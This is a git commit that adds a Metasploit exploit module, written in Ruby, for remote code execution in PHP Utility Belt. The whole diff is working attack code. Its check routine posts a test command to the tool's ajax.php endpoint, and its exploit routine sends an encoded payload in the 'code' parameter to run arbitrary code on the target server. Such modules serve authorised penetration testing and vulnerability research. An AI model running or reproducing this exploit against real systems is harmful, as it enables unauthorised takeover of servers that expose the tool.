Adding PHP Utility Belt Remote Code Execution

2016-03-01 09:22:25 +08:00 · 2016-03-01 09:22:25 +08:00 · 62a611a472
parent c5a9d59455
commit 62a611a472
1 changed files with 78 additions and 0 deletions
--- a/modules/exploits/multi/http/php_utility_belt_rce.rb
+++ b/modules/exploits/multi/http/php_utility_belt_rce.rb
@ -0,0 +1,78 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'PHP Utility Belt Remote Code Execution',
+      'Description'    => %q{
+         This module exploits a remote code execution vulnerability in PHP utility Belt
+         which is a set of tools for PHP developers and should not be installed in a
+         production environment because this application runs arbitrary PHP code as an
+         intended functionality.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'WICS', # initial discovery
+          'Jay Turla' # msf
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '38901' ],
+          [ 'URL', 'https://github.com/mboynes/php-utility-belt' ] # Official Repo
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'    => 2000,
+          'DisableNops' => true,
+        },
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          ['PHP Utility Belt', { } ]
+        ],
+      'DisclosureDate' => 'Aug 12 2015',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path of PHP utility belt', '/php-utility-belt/ajax.php']),
+      ],self.class)
+  end
+
+  def check
+    txt = Rex::Text.rand_text_alpha(8)
+    res = http_send_command("echo #{txt};")
+
+    if res && res.body =~ /#{txt}/
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def http_send_command(cmd)
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path),
+      'vars_post' => {
+        'code' => cmd
+      }
+    })
+  end
+
+  def exploit
+    http_send_command("#{payload.encoded}")
+  end
+end